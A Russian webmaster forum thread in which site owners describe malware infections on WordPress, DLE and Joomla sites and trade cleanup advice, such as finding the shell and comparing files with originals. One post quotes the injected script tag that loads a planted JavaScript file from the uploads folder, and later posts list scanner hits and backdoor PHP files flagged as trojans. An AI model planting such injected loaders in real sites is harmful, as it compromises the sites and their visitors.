- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
AAAAllleex,
И на Джумла такие скрипты. Какой хостинг? netangels ?
video.php- это шелл был ?
у меня тоже самое. До этого три дня яша проверял сайт нормально, но все еще находил вирус, насовали в ДЛЕ немеряно дряни, пока вычистила 3 перепроверки и прошло, а 4-ю все...как сглазали..не удалась пернепроверка и всё.
Напишите у кого такое было..как долго не мог перепроверить и платоны отписали ли кому-то о причинах?
Значит при проверке 4 раза не все удалили или вам опять напихали всяких вредоносных скриптов.
AAAAllleex,
И на Джумла такие скрипты. Какой хостинг? netangels ?
jino.ru.
video.php- это шелл был ?
Хз.
Беда с троянами на блоге с движком WP, в один из файлов php темы вставляется что-то типа <script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/switch.js"></script><script type="text/javascript">
document.write("<scr"+"ipt src='/wp-content/uploads/2011/07/fermin.js'><"+"/script>");
</script>, а в папках из каталога uploads возникают файлы sfw и js с произвольным именем. Чищу код, удаляю файлы, а они снова появляются, снова меняют код в файлах темы, бьюсь уже два месяца. Может кто-нибудь подскажет как троян вытравить с блога.
nelgun,
Пока не найдешь шелл, яваскрипты и .swf будут появляться.
Шелл загружается с массива $_POST
nelgun, ай-болит в помощь
Беда с троянами на блоге с движком WP, в один из файлов php темы вставляется что-то типа <script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/switch.js"></script><script type="text/javascript">
document.write("<scr"+"ipt src='/wp-content/uploads/2011/07/fermin.js'><"+"/script>");
</script>, а в папках из каталога uploads возникают файлы sfw и js с произвольным именем. Чищу код, удаляю файлы, а они снова появляются, снова меняют код в файлах темы, бьюсь уже два месяца. Может кто-нибудь подскажет как троян вытравить с блога.
На вряд ли получится тут просто указать, где что лежит, нужно проверять весь код вашего сайта, не рекомендую использовать сканеры ищут максимум самое популярно.
Всем спасибо за ответы, запустил по совету Ай-болит, может ли эта гадость сидеть в плагинах?
/wp-content/plugins/nofollow-free/lang/lang-pl.php
; w komentarzu, ponownie w***322;***261;czy si***281; nofollow - dla ochrony przed |spamerami."); define("_SETNUMCOM","Czy chcesz, by przy nickach komentuj***261;cy
/wp-content/plugins/antispam-bee/js/dashboard.min.js
ity":0.8}).hide(),k,a=0,y=q.length;a<y;a++){var f=Math.round(120-u*b[a]),g=Math.|round(0+e*(a+0.5));a||(k=["M",g,f,"C",g,f]);if(a&&a<y-1){var h=Math.round(120-u
wp-content/plugins/contextual-related-posts/timthumb/timthumb.php
image that says 'no hotlinkers' // nothing to worry about! :) $imgData = |base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0
гадость может быть где угодно, ай-болит тоже надо осторожно использовать, код сравните с оригиналом из офф. репозиротия
Файл (или файлы) на вашем сайте http://pravogroup.ru были изменены. Пожалуйста, просмотрите отчет ниже, чтобы проверить изменения не являются ли они результатом атаки.
Время сканирования: Sunday, December 8th 2:52 pm UTC
Добавленные файлы: 3
Удаленные файлы: 0
Измененные файлы: 2
Memory Used: 4.94 MB
Добавленные файлы
Файл Измененные Хеш файла
1. wp-includes/js/plupload/plupload.flash.php Sunday December 8th, 2013 at 2:04 pm UTC 46066571214578db67750b84090d9b7d
2. wp-includes/js/jquery/jquery.php Sunday December 8th, 2013 at 2:04 pm UTC f76f3256b8f9dac0651e05d985e1ddbc
3. wp-includes/css/wp-auth-check.min.php Sunday December 8th, 2013 at 2:04 pm UTC fe76c0ee352ef98cea6722333edde863
Про 2 и 3 Avast пишет: Угроза:PHP: Decode-Y[Trj]
Подозрительные файлы в приложении.